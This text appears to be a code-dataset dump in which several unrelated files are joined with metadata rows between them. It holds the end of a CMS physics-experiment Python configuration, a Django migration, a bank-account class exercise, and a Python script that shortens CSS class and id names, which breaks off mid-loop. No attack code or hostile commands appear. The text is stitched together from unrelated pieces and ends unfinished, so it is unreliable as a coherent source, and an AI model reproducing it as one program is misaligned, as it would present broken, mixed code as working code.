limit = cms.untracked.int32(0),
optionalPSet = cms.untracked.bool(True)
),
default = cms.untracked.PSet(
limit = cms.untracked.int32(10000000)
),
noTimeStamps = cms.untracked.bool(False),
optionalPSet = cms.untracked.bool(True),
threshold = cms.untracked.string('INFO')
),
cerr_stats = cms.untracked.PSet(
optionalPSet = cms.untracked.bool(True),
output = cms.untracked.string('cerr'),
threshold = cms.untracked.string('WARNING')
),
cout = cms.untracked.PSet(
placeholder = cms.untracked.bool(True)
),
debugModules = cms.untracked.vstring(),
debugs = cms.untracked.PSet(
placeholder = cms.untracked.bool(True)
),
default = cms.untracked.PSet(
),
destinations = cms.untracked.vstring(
'warnings',
'errors',
'infos',
'debugs',
'cout',
'cerr'
),
errors = cms.untracked.PSet(
placeholder = cms.untracked.bool(True)
),
fwkJobReports = cms.untracked.vstring('FrameworkJobReport'),
infos = cms.untracked.PSet(
Root_NoDictionary = cms.untracked.PSet(
limit = cms.untracked.int32(0),
optionalPSet = cms.untracked.bool(True)
),
optionalPSet = cms.untracked.bool(True),
placeholder = cms.untracked.bool(True)
),
statistics = cms.untracked.vstring('cerr_stats'),
suppressDebug = cms.untracked.vstring(),
suppressInfo = cms.untracked.vstring(),
suppressWarning = cms.untracked.vstring(),
warnings = cms.untracked.PSet(
placeholder = cms.untracked.bool(True)
)
)
process.RandomNumberGeneratorService = cms.Service("RandomNumberGeneratorService",
CTPPSFastRecHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1357987)
),
LHCTransport = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(87654321)
),
MuonSimHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(987346)
),
VtxSmeared = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(98765432)
),
ecalPreshowerRecHit = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(6541321)
),
ecalRecHit = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(654321)
),
externalLHEProducer = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(234567)
),
famosPileUp = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
fastSimProducer = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(13579)
),
fastTrackerRecHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(24680)
),
g4SimHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(11)
),
generator = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(123456789)
),
hbhereco = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(541321)
),
hfreco = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(541321)
),
hiSignal = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(123456789)
),
hiSignalG4SimHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(11)
),
hiSignalLHCTransport = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(88776655)
),
horeco = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(541321)
),
l1ParamMuons = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(6453209)
),
mix = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(12345)
),
mixData = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(12345)
),
mixGenPU = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
mixRecoTracks = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
mixSimCaloHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
paramMuons = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(54525)
),
saveFileName = cms.untracked.string(''),
simBeamSpotFilter = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(87654321)
),
simMuonCSCDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(11223344)
),
simMuonDTDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
),
simMuonRPCDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
),
simSiStripDigiSimLink = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
)
)
process.TFileService = cms.Service("TFileService",
fileName = cms.string('output_UL_C_ak4.root')
)
process.CSCGeometryESModule = cms.ESProducer("CSCGeometryESModule",
alignmentsLabel = cms.string(''),
appendToDataLabel = cms.string(''),
applyAlignment = cms.bool(True),
debugV = cms.untracked.bool(False),
useCentreTIOffsets = cms.bool(False),
useDDD = cms.bool(False),
useGangedStripsInME1a = cms.bool(True),
useOnlyWiresInME1a = cms.bool(False),
useRealWireGeometry = cms.bool(True)
)
process.CaloGeometryBuilder = cms.ESProducer("CaloGeometryBuilder",
SelectedCalos = cms.vstring(
'HCAL',
'ZDC',
'CASTOR',
'EcalBarrel',
'EcalEndcap',
'EcalPreshower',
'TOWER'
)
)
process.CaloTopologyBuilder = cms.ESProducer("CaloTopologyBuilder")
process.CaloTowerGeometryFromDBEP = cms.ESProducer("CaloTowerGeometryFromDBEP",
applyAlignment = cms.bool(False)
)
process.CaloTowerTopologyEP = cms.ESProducer("CaloTowerTopologyEP")
process.CastorDbProducer = cms.ESProducer("CastorDbProducer",
appendToDataLabel = cms.string('')
)
process.CastorGeometryFromDBEP = cms.ESProducer("CastorGeometryFromDBEP",
applyAlignment = cms.bool(False)
)
process.DTGeometryESModule = cms.ESProducer("DTGeometryESModule",
alignmentsLabel = cms.string(''),
appendToDataLabel = cms.string(''),
applyAlignment = cms.bool(True),
fromDDD = cms.bool(False)
)
process.EcalBarrelGeometryFromDBEP = cms.ESProducer("EcalBarrelGeometryFromDBEP",
applyAlignment = cms.bool(True)
)
process.EcalElectronicsMappingBuilder = cms.ESProducer("EcalElectronicsMappingBuilder")
process.EcalEndcapGeometryFromDBEP = cms.ESProducer("EcalEndcapGeometryFromDBEP",
applyAlignment = cms.bool(True)
)
process.EcalLaserCorrectionService = cms.ESProducer("EcalLaserCorrectionService")
process.EcalPreshowerGeometryFromDBEP = cms.ESProducer("EcalPreshowerGeometryFromDBEP",
applyAlignment = cms.bool(True)
)
process.EcalTrigTowerConstituentsMapBuilder = cms.ESProducer("EcalTrigTowerConstituentsMapBuilder",
MapFile = cms.untracked.string('Geometry/EcalMapping/data/EndCap_TTMap.txt')
)
process.GlobalTrackingGeometryESProducer = cms.ESProducer("GlobalTrackingGeometryESProducer")
process.HcalAlignmentEP = cms.ESProducer("HcalAlignmentEP")
process.HcalGeometryFromDBEP = cms.ESProducer("HcalGeometryFromDBEP",
applyAlignment = cms.bool(True)
)
process.MuonDetLayerGeometryESProducer = cms.ESProducer("MuonDetLayerGeometryESProducer")
process.MuonNumberingInitialization = cms.ESProducer("MuonNumberingInitialization")
process.ParabolicParametrizedMagneticFieldProducer = cms.ESProducer("AutoParametrizedMagneticFieldProducer",
label = cms.untracked.string('ParabolicMf'),
valueOverride = cms.int32(18268),
version = cms.string('Parabolic')
)
process.RPCGeometryESModule = cms.ESProducer("RPCGeometryESModule",
compatibiltyWith11 = cms.untracked.bool(True),
useDDD = cms.untracked.bool(False)
)
process.SiStripRecHitMatcherESProducer = cms.ESProducer("SiStripRecHitMatcherESProducer",
ComponentName = cms.string('StandardMatcher'),
NSigmaInside = cms.double(3.0),
PreFilter = cms.bool(False)
)
process.StripCPEfromTrackAngleESProducer = cms.ESProducer("StripCPEESProducer",
ComponentName = cms.string('StripCPEfromTrackAngle'),
ComponentType = cms.string('StripCPEfromTrackAngle'),
parameters = cms.PSet(
mLC_P0 = cms.double(-0.326),
mLC_P1 = cms.double(0.618),
mLC_P2 = cms.double(0.3),
mTEC_P0 = cms.double(-1.885),
mTEC_P1 = cms.double(0.471),
mTIB_P0 = cms.double(-0.742),
mTIB_P1 = cms.double(0.202),
mTID_P0 = cms.double(-1.427),
mTID_P1 = cms.double(0.433),
mTOB_P0 = cms.double(-1.026),
mTOB_P1 = cms.double(0.253),
maxChgOneMIP = cms.double(6000.0),
useLegacyError = cms.bool(False)
)
)
process.TrackerRecoGeometryESProducer = cms.ESProducer("TrackerRecoGeometryESProducer")
process.VolumeBasedMagneticFieldESProducer = cms.ESProducer("VolumeBasedMagneticFieldESProducerFromDB",
debugBuilder = cms.untracked.bool(False),
label = cms.untracked.string(''),
valueOverride = cms.int32(18268)
)
process.XMLFromDBSource = cms.ESProducer("XMLIdealGeometryESProducer",
label = cms.string('Extended'),
rootDDName = cms.string('cms:OCMS')
)
process.ZdcGeometryFromDBEP = cms.ESProducer("ZdcGeometryFromDBEP",
applyAlignment = cms.bool(False)
)
process.fakeForIdealAlignment = cms.ESProducer("FakeAlignmentProducer",
appendToDataLabel = cms.string('fakeForIdeal')
)
process.hcalDDDRecConstants = cms.ESProducer("HcalDDDRecConstantsESModule",
appendToDataLabel = cms.string('')
)
process.hcalDDDSimConstants = cms.ESProducer("HcalDDDSimConstantsESModule",
appendToDataLabel = cms.string('')
)
process.hcalTopologyIdeal = cms.ESProducer("HcalTopologyIdealEP",
Exclude = cms.untracked.string(''),
MergePosition = cms.untracked.bool(False),
appendToDataLabel = cms.string('')
)
process.hcal_db_producer = cms.ESProducer("HcalDbProducer",
dump = cms.untracked.vstring(''),
file = cms.untracked.string('')
)
process.idealForDigiCSCGeometry = cms.ESProducer("CSCGeometryESModule",
alignmentsLabel = cms.string('fakeForIdeal'),
appendToDataLabel = cms.string('idealForDigi'),
applyAlignment = cms.bool(False),
debugV = cms.untracked.bool(False),
useCentreTIOffsets = cms.bool(False),
useDDD = cms.bool(False),
useGangedStripsInME1a = cms.bool(True),
useOnlyWiresInME1a = cms.bool(False),
useRealWireGeometry = cms.bool(True)
)
process.idealForDigiDTGeometry = cms.ESProducer("DTGeometryESModule",
alignmentsLabel = cms.string('fakeForIdeal'),
appendToDataLabel = cms.string('idealForDigi'),
applyAlignment = cms.bool(False),
fromDDD = cms.bool(False)
)
process.idealForDigiTrackerGeometry = cms.ESProducer("TrackerDigiGeometryESModule",
alignmentsLabel = cms.string('fakeForIdeal'),
appendToDataLabel = cms.string('idealForDigi'),
applyAlignment = cms.bool(False),
fromDDD = cms.bool(False)
)
process.siPixelQualityESProducer = cms.ESProducer("SiPixelQualityESProducer",
ListOfRecordToMerge = cms.VPSet(
cms.PSet(
record = cms.string('SiPixelQualityFromDbRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('SiPixelDetVOffRcd'),
tag = cms.string('')
)
),
siPixelQualityLabel = cms.string('')
)
process.siStripBackPlaneCorrectionDepESProducer = cms.ESProducer("SiStripBackPlaneCorrectionDepESProducer",
BackPlaneCorrectionDeconvMode = cms.PSet(
label = cms.untracked.string('deconvolution'),
record = cms.string('SiStripBackPlaneCorrectionRcd')
),
BackPlaneCorrectionPeakMode = cms.PSet(
label = cms.untracked.string('peak'),
record = cms.string('SiStripBackPlaneCorrectionRcd')
),
LatencyRecord = cms.PSet(
label = cms.untracked.string(''),
record = cms.string('SiStripLatencyRcd')
)
)
process.siStripGainESProducer = cms.ESProducer("SiStripGainESProducer",
APVGain = cms.VPSet(
cms.PSet(
Label = cms.untracked.string(''),
NormalizationFactor = cms.untracked.double(1.0),
Record = cms.string('SiStripApvGainRcd')
),
cms.PSet(
Label = cms.untracked.string(''),
NormalizationFactor = cms.untracked.double(1.0),
Record = cms.string('SiStripApvGain2Rcd')
)
),
AutomaticNormalization = cms.bool(False),
appendToDataLabel = cms.string(''),
printDebug = cms.untracked.bool(False)
)
process.siStripLorentzAngleDepESProducer = cms.ESProducer("SiStripLorentzAngleDepESProducer",
LatencyRecord = cms.PSet(
label = cms.untracked.string(''),
record = cms.string('SiStripLatencyRcd')
),
LorentzAngleDeconvMode = cms.PSet(
label = cms.untracked.string('deconvolution'),
record = cms.string('SiStripLorentzAngleRcd')
),
LorentzAnglePeakMode = cms.PSet(
label = cms.untracked.string('peak'),
record = cms.string('SiStripLorentzAngleRcd')
)
)
process.siStripQualityESProducer = cms.ESProducer("SiStripQualityESProducer",
ListOfRecordToMerge = cms.VPSet(
cms.PSet(
record = cms.string('SiStripDetVOffRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('SiStripDetCablingRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('RunInfoRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('SiStripBadChannelRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('SiStripBadFiberRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('SiStripBadModuleRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('SiStripBadStripRcd'),
tag = cms.string('')
)
),
PrintDebugOutput = cms.bool(False),
ReduceGranularity = cms.bool(False),
ThresholdForReducedGranularity = cms.double(0.3),
UseEmptyRunInfo = cms.bool(False),
appendToDataLabel = cms.string('')
)
process.sistripconn = cms.ESProducer("SiStripConnectivity")
process.stripCPEESProducer = cms.ESProducer("StripCPEESProducer",
ComponentName = cms.string('stripCPE'),
ComponentType = cms.string('SimpleStripCPE'),
parameters = cms.PSet(
)
)
process.trackerGeometryDB = cms.ESProducer("TrackerDigiGeometryESModule",
alignmentsLabel = cms.string(''),
appendToDataLabel = cms.string(''),
applyAlignment = cms.bool(True),
fromDDD = cms.bool(False)
)
process.trackerNumberingGeometryDB = cms.ESProducer("TrackerGeometricDetESModule",
appendToDataLabel = cms.string(''),
fromDDD = cms.bool(False)
)
process.trackerTopology = cms.ESProducer("TrackerTopologyEP",
appendToDataLabel = cms.string('')
)
process.GlobalTag = cms.ESSource("PoolDBESSource",
DBParameters = cms.PSet(
authenticationPath = cms.untracked.string(''),
authenticationSystem = cms.untracked.int32(0),
messageLevel = cms.untracked.int32(0),
security = cms.untracked.string('')
),
DumpStat = cms.untracked.bool(False),
ReconnectEachRun = cms.untracked.bool(False),
RefreshAlways = cms.untracked.bool(False),
RefreshEachRun = cms.untracked.bool(False),
RefreshOpenIOVs = cms.untracked.bool(False),
connect = cms.string('frontier://FrontierProd/CMS_CONDITIONS'),
globaltag = cms.string(''),
pfnPostfix = cms.untracked.string(''),
pfnPrefix = cms.untracked.string(''),
snapshotTime = cms.string(''),
toGet = cms.VPSet()
)
process.HcalTimeSlewEP = cms.ESSource("HcalTimeSlewEP",
appendToDataLabel = cms.string('HBHE'),
timeSlewParametersM2 = cms.VPSet(
cms.PSet(
slope = cms.double(-3.178648),
tmax = cms.double(16.0),
tzero = cms.double(23.960177)
),
cms.PSet(
slope = cms.double(-1.5610227),
tmax = cms.double(10.0),
tzero = cms.double(11.977461)
),
cms.PSet(
slope = cms.double(-1.075824),
tmax = cms.double(6.25),
tzero = cms.double(9.109694)
)
),
timeSlewParametersM3 = cms.VPSet(
cms.PSet(
cap = cms.double(6.0),
tspar0 = cms.double(12.2999),
tspar0_siPM = cms.double(0.0),
tspar1 = cms.double(-2.19142),
tspar1_siPM = cms.double(0.0),
tspar2 = cms.double(0.0),
tspar2_siPM = cms.double(0.0)
),
cms.PSet(
cap = cms.double(6.0),
tspar0 = cms.double(15.5),
tspar0_siPM = cms.double(0.0),
tspar1 = cms.double(-3.2),
tspar1_siPM = cms.double(0.0),
tspar2 = cms.double(32.0),
tspar2_siPM = cms.double(0.0)
),
cms.PSet(
cap = cms.double(6.0),
tspar0 = cms.double(12.2999),
tspar0_siPM = cms.double(0.0),
tspar1 = cms.double(-2.19142),
tspar1_siPM = cms.double(0.0),
tspar2 = cms.double(0.0),
tspar2_siPM = cms.double(0.0)
),
cms.PSet(
cap = cms.double(6.0),
tspar0 = cms.double(12.2999),
tspar0_siPM = cms.double(0.0),
tspar1 = cms.double(-2.19142),
tspar1_siPM = cms.double(0.0),
tspar2 = cms.double(0.0),
tspar2_siPM = cms.double(0.0)
)
)
)
process.HepPDTESSource = cms.ESSource("HepPDTESSource",
pdtFileName = cms.FileInPath('SimGeneral/HepPDTESSource/data/pythiaparticle.tbl')
)
process.eegeom = cms.ESSource("EmptyESSource",
firstValid = cms.vuint32(1),
iovIsRunNotTime = cms.bool(True),
recordName = cms.string('EcalMappingRcd')
)
process.es_hardcode = cms.ESSource("HcalHardcodeCalibrations",
GainWidthsForTrigPrims = cms.bool(False),
HBRecalibration = cms.bool(False),
HBmeanenergies = cms.FileInPath('CalibCalorimetry/HcalPlugins/data/meanenergiesHB.txt'),
HBreCalibCutoff = cms.double(20.0),
HERecalibration = cms.bool(False),
HEmeanenergies = cms.FileInPath('CalibCalorimetry/HcalPlugins/data/meanenergiesHE.txt'),
HEreCalibCutoff = cms.double(20.0),
HFRecalParameterBlock = cms.PSet(
HFdepthOneParameterA = cms.vdouble(
0.004123, 0.00602, 0.008201, 0.010489, 0.013379,
0.016997, 0.021464, 0.027371, 0.034195, 0.044807,
0.058939, 0.125497
),
HFdepthOneParameterB = cms.vdouble(
-4e-06, -2e-06, 0.0, 4e-06, 1.5e-05,
2.6e-05, 6.3e-05, 8.4e-05, 0.00016, 0.000107,
0.000425, 0.000209
),
HFdepthTwoParameterA = cms.vdouble(
0.002861, 0.004168, 0.0064, 0.008388, 0.011601,
0.014425, 0.018633, 0.023232, 0.028274, 0.035447,
0.051579, 0.086593
),
HFdepthTwoParameterB = cms.vdouble(
-2e-06, -0.0, -7e-06, -6e-06, -2e-06,
1e-06, 1.9e-05, 3.1e-05, 6.7e-05, 1.2e-05,
0.000157, -3e-06
)
),
HFRecalibration = cms.bool(False),
SiPMCharacteristics = cms.VPSet(
cms.PSet(
crosstalk = cms.double(0.0),
nonlin1 = cms.double(1.0),
nonlin2 = cms.double(0.0),
nonlin3 = cms.double(0.0),
pixels = cms.int32(36000)
),
cms.PSet(
crosstalk = cms.double(0.0),
nonlin1 = cms.double(1.0),
nonlin2 = cms.double(0.0),
nonlin3 = cms.double(0.0),
pixels = cms.int32(2500)
),
cms.PSet(
crosstalk = cms.double(0.17),
nonlin1 = cms.double(1.00985),
nonlin2 = cms.double(7.84089e-06),
nonlin3 = cms.double(2.86282e-10),
pixels = cms.int32(27370)
),
cms.PSet(
crosstalk = cms.double(0.196),
nonlin1 = cms.double(1.00546),
nonlin2 = cms.double(6.40239e-06),
nonlin3 = cms.double(1.27011e-10),
pixels = cms.int32(38018)
),
cms.PSet(
crosstalk = cms.double(0.17),
nonlin1 = cms.double(1.00985),
nonlin2 = cms.double(7.84089e-06),
nonlin3 = cms.double(2.86282e-10),
pixels = cms.int32(27370)
),
cms.PSet(
crosstalk = cms.double(0.196),
nonlin1 = cms.double(1.00546),
nonlin2 = cms.double(6.40239e-06),
nonlin3 = cms.double(1.27011e-10),
pixels = cms.int32(38018)
),
cms.PSet(
crosstalk = cms.double(0.0),
nonlin1 = cms.double(1.0),
nonlin2 = cms.double(0.0),
nonlin3 = cms.double(0.0),
pixels = cms.int32(0)
)
),
hb = cms.PSet(
darkCurrent = cms.vdouble(0.0),
doRadiationDamage = cms.bool(False),
gain = cms.vdouble(0.19),
gainWidth = cms.vdouble(0.0),
mcShape = cms.int32(125),
pedestal = cms.double(3.285),
pedestalWidth = cms.double(0.809),
photoelectronsToAnalog = cms.double(0.3305),
qieOffset = cms.vdouble(-0.49, 1.8, 7.2, 37.9),
qieSlope = cms.vdouble(0.912, 0.917, 0.922, 0.923),
qieType = cms.int32(0),
recoShape = cms.int32(105),
zsThreshold = cms.int32(8)
),
hbUpgrade = cms.PSet(
darkCurrent = cms.vdouble(0.01, 0.015),
doRadiationDamage = cms.bool(True),
gain = cms.vdouble(0.0006252),
gainWidth = cms.vdouble(0),
mcShape = cms.int32(206),
pedestal = cms.double(17.3),
pedestalWidth = cms.double(1.5),
photoelectronsToAnalog = cms.double(40.0),
qieOffset = cms.vdouble(0.0, 0.0, 0.0, 0.0),
qieSlope = cms.vdouble(0.05376, 0.05376, 0.05376, 0.05376),
qieType = cms.int32(2),
radiationDamage = cms.PSet(
depVsNeutrons = cms.vdouble(5.543e-10, 8.012e-10),
depVsTemp = cms.double(0.0631),
intlumiOffset = cms.double(150),
intlumiToNeutrons = cms.double(367000000.0),
temperatureBase = cms.double(20),
temperatureNew = cms.double(-5)
),
recoShape = cms.int32(206),
zsThreshold = cms.int32(16)
),
he = cms.PSet(
darkCurrent = cms.vdouble(0.0),
doRadiationDamage = cms.bool(False),
gain = cms.vdouble(0.23),
gainWidth = cms.vdouble(0),
mcShape = cms.int32(125),
pedestal = cms.double(3.163),
pedestalWidth = cms.double(0.9698),
photoelectronsToAnalog = cms.double(0.3305),
qieOffset = cms.vdouble(-0.38, 2.0, 7.6, 39.6),
qieSlope = cms.vdouble(0.912, 0.916, 0.92, 0.922),
qieType = cms.int32(0),
recoShape = cms.int32(105),
zsThreshold = cms.int32(9)
),
heUpgrade = cms.PSet(
darkCurrent = cms.vdouble(0.01, 0.015),
doRadiationDamage = cms.bool(True),
gain = cms.vdouble(0.0006252),
gainWidth = cms.vdouble(0),
mcShape = cms.int32(206),
pedestal = cms.double(17.3),
pedestalWidth = cms.double(1.5),
photoelectronsToAnalog = cms.double(40.0),
qieOffset = cms.vdouble(0.0, 0.0, 0.0, 0.0),
qieSlope = cms.vdouble(0.05376, 0.05376, 0.05376, 0.05376),
qieType = cms.int32(2),
radiationDamage = cms.PSet(
depVsNeutrons = cms.vdouble(5.543e-10, 8.012e-10),
depVsTemp = cms.double(0.0631),
intlumiOffset = cms.double(75),
intlumiToNeutrons = cms.double(29200000.0),
temperatureBase = cms.double(20),
temperatureNew = cms.double(5)
),
recoShape = cms.int32(206),
zsThreshold = cms.int32(16)
),
hf = cms.PSet(
darkCurrent = cms.vdouble(0.0),
doRadiationDamage = cms.bool(False),
gain = cms.vdouble(0.14, 0.135),
gainWidth = cms.vdouble(0.0, 0.0),
mcShape = cms.int32(301),
pedestal = cms.double(9.354),
pedestalWidth = cms.double(2.516),
photoelectronsToAnalog = cms.double(0.0),
qieOffset = cms.vdouble(-0.87, 1.4, 7.8, -29.6),
qieSlope = cms.vdouble(0.359, 0.358, 0.36, 0.367),
qieType = cms.int32(0),
recoShape = cms.int32(301),
zsThreshold = cms.int32(-9999)
),
hfUpgrade = cms.PSet(
darkCurrent = cms.vdouble(0.0),
doRadiationDamage = cms.bool(False),
gain = cms.vdouble(0.14, 0.135),
gainWidth = cms.vdouble(0.0, 0.0),
mcShape = cms.int32(301),
pedestal = cms.double(13.33),
pedestalWidth = cms.double(3.33),
photoelectronsToAnalog = cms.double(0.0),
qieOffset = cms.vdouble(0.0697, -0.7405, 12.38, -671.9),
qieSlope = cms.vdouble(0.297, 0.298, 0.298, 0.313),
qieType = cms.int32(1),
recoShape = cms.int32(301),
zsThreshold = cms.int32(-9999)
),
ho = cms.PSet(
darkCurrent = cms.vdouble(0.0),
doRadiationDamage = cms.bool(False),
gain = cms.vdouble(0.006, 0.0087),
gainWidth = cms.vdouble(0.0, 0.0),
mcShape = cms.int32(201),
pedestal = cms.double(12.06),
pedestalWidth = cms.double(0.6285),
photoelectronsToAnalog = cms.double(4.0),
qieOffset = cms.vdouble(-0.44, 1.4, 7.1, 38.5),
qieSlope = cms.vdouble(0.907, 0.915, 0.92, 0.921),
qieType = cms.int32(0),
recoShape = cms.int32(201),
zsThreshold = cms.int32(24)
),
iLumi = cms.double(-1.0),
killHE = cms.bool(False),
testHEPlan1 = cms.bool(False),
testHFQIE10 = cms.bool(False),
toGet = cms.untracked.vstring('GainWidths'),
useHBUpgrade = cms.bool(False),
useHEUpgrade = cms.bool(False),
useHFUpgrade = cms.bool(False),
useHOUpgrade = cms.bool(True),
useIeta18depth1 = cms.bool(True),
useLayer0Weight = cms.bool(False)
)
process.prefer("es_hardcode")
process.eventFilterHLT = cms.Sequence(process.hlt)
process.runAnalyzer = cms.Path(process.eventFilterHLT+process.analyzer)
| [
"parker.gardner95@gmail.com"
] | parker.gardner95@gmail.com |
23f82bb8c49c6bd705e2554aa96eaf4871d316d0 | afc95be6f7e4b4abb2a81abfe50e1e2d5653e05e | /CrawlManager/Crawls/migrations/0002_auto_20190119_0835.py | d8813714e52d47e63d780757df36733e449a06c4 | [] | no_license | iamzhijin/sf_spider | 316257e6e7821548686e0d66f234009429f87761 | c068d5d363839eb8e521e55abc6ca48d348a41a3 | refs/heads/master | 2023-01-28T12:06:27.011834 | 2019-02-27T09:50:11 | 2019-02-27T09:50:11 | 161,603,917 | 3 | 0 | null | 2022-12-07T04:13:47 | 2018-12-13T07:58:24 | Python | UTF-8 | Python | false | false | 443 | py | # Generated by Django 2.1.4 on 2019-01-19 08:35
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Crawls', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='crawls',
options={'ordering': ['-update_time']},
),
migrations.AlterModelTable(
name='crawls',
table='crawls',
),
]
| [
"liuyun@yscredit.com"
] | liuyun@yscredit.com |
197d28ad27055c99b501b8686cb22585cb12338c | aa5bf16e117b1b57e8090ab9b44ca51042aac2fc | /Prac-4/4.py | 77994f6bfd1c6be39e0c4737e72e2d9dafbbf2fd | [] | no_license | hardilundavia/extra | a3f7536911dd0d50ed276e0209e5ef0535e5ae80 | 1f82d35ee8801909516e97f2ffac6bc4f57d06d8 | refs/heads/master | 2020-06-28T20:22:14.246229 | 2019-12-23T11:50:38 | 2019-12-23T11:50:38 | 200,328,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,098 | py | class BankAccount:
intrest_rate=4;
def set(self):
self.ac_no=int(input("Enter Account Number :"));
self.ac_name=input("Enter Account Name :");
self.balance=int(input("Enter Balance :"));
def show(self):
print("Ac_no\tAc_name\tBalance");
print(self.ac_no,"\t",self.ac_name,"\t",self.balance);
def deposite(self):
w=int(input("Enter Deposited Amount :"));
self.balance=self.balance+w;
self.show();
def withdraw(self):
w=int(input("Enter Withdraw Amount :"));
if self.balance < w:
print("Insufficient Balance");
return;
else:
self.balance=self.balance-w;
self.show();
def calc_intrest_rate(self):
self.balance = self.balance + (self.balance * self.intrest_rate)/100;
self.show();
b1=BankAccount();
b2=BankAccount();
b1.set();
b1.show();
b1.deposite();
b1.withdraw();
b1.calc_intrest_rate();
print("New Object b2");
b2.set();
b2.show();
b2.deposite();
b2.withdraw();
b2.calc_intrest_rate();
| [
"noreply@github.com"
] | hardilundavia.noreply@github.com |
dac12c063d52b36e99c387294e3b6371d00e6aef | 41fbec3acb666d7f39ad0640129e5de9eb1ba125 | /classid.py | 8ca98eb998e4b298d4ac6c96340d943143912ca4 | [] | no_license | SirBaaron/classid | 0190839f02bfa0b3d7269dc365394eca2b0ba2ca | b5875cfb681ba4744e47babbc8ff3a34ec667698 | refs/heads/master | 2021-01-17T11:37:01.738328 | 2016-08-17T15:38:10 | 2016-08-17T15:38:10 | 65,848,847 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,086 | py | #Written by Aaron Längert
import sys;
import re;
import json;
import string;
import codecs;
print("Written by Aaron Längert\n");
if(len(sys.argv)) == 1:
print("\nUsage: python " + sys.argv[0] + " <file> [file] [file]");
exit();
blacklist = [];
try:
file = open("classid-ignore.json");
try:
blacklist = json.load(file);
file.close();
print("Found classid-ignore.json file!");
except:
print("Oops.. something seems wrong with your classid-ignore file :/");
except:
print("You can exclude ids and classes by specifying them in classid-ignore.json. See the documentation for more information.");
values = {};
alphabet = "a";
counter = 0;
savepairs = False;
totalsave = 0;
def countup():
global counter;
global alphabet;
if counter == 51:
counter = 0;
else:
counter += 1;
if counter > 0:
alphabet = alphabet[:-1];
alphabet += string.ascii_letters[counter: counter + 1];
for fle in sys.argv[1:]:
if(fle == "--save-pairs"):
savepairs = True;
break;
typ = str(fle.rsplit(".", 1)[-1]);
if (typ == "html") or (typ == "js") or (typ == "css"):
try:
file = codecs.open(fle, "r+", "utf-8");
content = file.read();
except:
print("Can't open file " + fle + ": " + str(sys.exc_info()[0]));
break;
print("shortening " + fle + "..");
splitter = extractor = '.+';
if (typ == "html"):
mask = ['(?<=class=")[^"]+', '(?<=id=")[^"]+'];
splitter = '[^ ]+';
if (typ == "js"):
mask = ['classid\("[^")]+"\)'];
extractor = '(?<=").[^"]+';
if (typ == "css"):
mask = ['(?<=\.)-?[_a-zA-Z]+[_a-zA-Z0-9-]*(?!\s)*', '(?<=#)-?[_a-zA-Z]+[_a-zA-Z0-9-]*(?=[^}]*\{)'];
for regex in mask:
matches = re.finditer(regex, content, re.M);
sparing = 0;
for match in matches:
parts = re.finditer(splitter, match.group(0));
for classid in parts:
core = re.search(extractor, classid.group(0));
if (core.group(0) in blacklist) and (typ != "js"):
break;
elif core.group(0) in blacklist:
replacewith = core.group(0);
elif core.group(0) in values:
replacewith = values.get(core.group(0));
else:
replacewith = alphabet;
values[core.group(0)] = alphabet;
countup();
if typ == "js":
replacewith = "\"" + replacewith + "\"";
totalsave -= 9; #the chracters from classid() technically don't count
